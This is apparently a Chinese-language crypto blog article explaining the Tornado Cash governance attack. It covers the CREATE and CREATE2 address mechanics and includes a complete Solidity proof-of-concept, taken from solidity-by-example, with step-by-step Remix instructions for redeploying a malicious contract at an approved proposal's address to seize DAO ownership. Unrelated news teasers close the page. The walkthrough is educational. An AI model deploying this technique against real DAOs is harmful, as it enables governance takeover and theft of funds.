大概两周前(5 月 20 日),知名混币协议 Tornado Cash 遭受到治理攻击,黑客获取到了Tornado Cash的治理合约的控制权(Owner)。
攻击过程是这样的:攻击者先提交了一个“看起来正常”的提案, 待提案通过之后, 销毁了提案要执行的合约地址, 并在该地址上重新创建了一个攻击合约。
攻击过程可以查看 SharkTeam 的 Tornado.Cash提案攻击原理分析。
这里攻击的关键是在同一个地址上部署了不同的合约, 这是如何实现的呢?
EVM 中有两个操作码用来创建合约:CREATE 与 CREATE2 。
当使用 new Token() 使用的是 CREATE 操作码 , 创建的合约地址计算函数为:
address tokenAddr = bytes20(keccak256(senderAddress, nonce))创建的合约地址是通过创建者地址 + 创建者Nonce(创建合约的数量)来确定的, 由于 Nonce 总是逐步递增的, 当 Nonce 增加时,创建的合约地址总是是不同的。
当添加一个salt时 new Token{salt: bytes32(。() ,则使用的是 CREATE2 操作码 , 创建的合约地址计算函数为:
address tokenAddr = bytes20(keccak256(0xFF, senderAddress, salt, bytecode))创建的合约地址是 创建者地址 + 自定义的盐 + 要部署的智能合约的字节码, 因此 只有相同字节码 和 使用相同的盐值,才可以部署到同一个合约地址上。
那么如何才能在同一地址如何部署不用的合约?
攻击者结合使用 Create2 和 Create 来创建合约, 如图:
代码参考自:https://solidity-by-example.org/hacks/deploy-different-contracts-same-address/
先用 Create2 部署一个合约 Deployer , 在 Deployer 使用 Create 创建目标合约 Proposal(用于提案使用)。 Deployer 和 Proposal 合约中均有自毁实现(selfdestruct)。
在提案通过后,攻击者把 Deployer 和 Proposal 合约销毁,然后重新用相同的slat创建 Deployer , Deployer 字节码不变,slat 也相同,因此会得到一个和之前相同的 Deployer 合约地址, 但此时 Deployer 合约的状态被清空了, nonce 从 0 开始,因此可以使用该 nonce 创建另一个合约Attack。
此代码来自:https://solidity-by-example.org/hacks/deploy-different-contracts-same-address/
// SPDX-License-Identifier: MITpragma solidity ^0.8.17;contract DAO { struct Proposal { address target; bool approved; bool executed; } address public owner = msg.sender; Proposal[] public proposals; function approve(address target) external { require(msg.sender == owner, "not authorized"); proposals.push(Proposal({target: target, approved: true, executed: false})); } function execute(uint256 proposalId) external payable { Proposal storage proposal = proposals[proposalId]; require(proposal.approved, "not approved"); require(!proposal.executed, "executed"); proposal.executed = true; (bool ok, ) = proposal.target.delegatecall( abi.encodeWithSignature("executeProposal()") ); require(ok, "delegatecall failed"); }}contract Proposal { event Log(string message); function executeProposal() external { emit Log("Excuted code approved by DAO"); } function emergencyStop() external { selfdestruct(payable(address(0))); }}contract Attack { event Log(string message); address public owner; function executeProposal() external { emit Log("Excuted code not approved by DAO :)"); // For example - set DAO's owner to attacker owner = msg.sender; }}contract DeployerDeployer { event Log(address addr); function deploy() external { bytes32 salt = keccak256(abi.encode(uint(123))); address addr = address(new Deployer{salt: salt}()); emit Log(addr); }}contract Deployer { event Log(address addr); function deployProposal() external { address addr = address(new Proposal()); emit Log(addr); } function deployAttack() external { address addr = address(new Attack()); emit Log(addr); } function kill() external { selfdestruct(payable(address(0))); }}大家可以使用该代码自己在 Remix 中演练一下。
首先部署 DeployerDeployer , 调用 DeployerDeployer.deploy() 部署 Deployer , 然后调用 Deployer.deployProposal() 部署 Proposal 。
拿到 Proposal 提案合约地址后, 向 DAO 发起提案。
分别调用 Deployer.kill 和 Proposal.emergencyStop 销毁掉 Deployer 和 Proposal
再次调用 DeployerDeployer.deploy() 部署 Deployer , 调用 Deployer.deployAttack() 部署 Attack , Attack 将和之前的 Proposal 一致。
执行 DAO.execute 时,攻击完成 获取到了 DAO 的 Owner 权限。
区块律动BlockBeats
曼昆区块链法律
Foresight News
GWEI Research
吴说区块链
西柚yoga
ETH中文
金色早8点
金色财经 子木
ABCDE
0xAyA
ERC-6551 提案是一个全新代币标准,极大地增强了ERC-721(即NFT)的功能性,于2023年5月7日在以太坊主网上发布:通过ERC-6551.
大约一个月前,zkSync 生态去中心化永续合约协议 Phezzan Protocol 向社区通知了将关停项目的决定.
Convex持有超过50%的veCRV,但cvxCRV的负溢价最高,Convex未来将向cvxCRV分配更多权益.
作者:深链DeepChain 编译:深姐 表达对比特币的支持 佛罗里达州州长罗恩·德桑蒂斯宣布,他将角逐美国总统大选的共和党提名.
撰文:563,Bankless作者 编译:金色财经很难相信Terra 的死亡螺旋已经过去一年了,自从蒸发了几百亿美元的财富后,UST对市场的影响仍然很大.
尊敬的红杉中国成员企业创始人:见信如晤!今天,红杉全球宣布了一项重要决定,将在2024年3月31日之前实现三大区域(美欧、中国、印度/东南亚)的各自完全独立.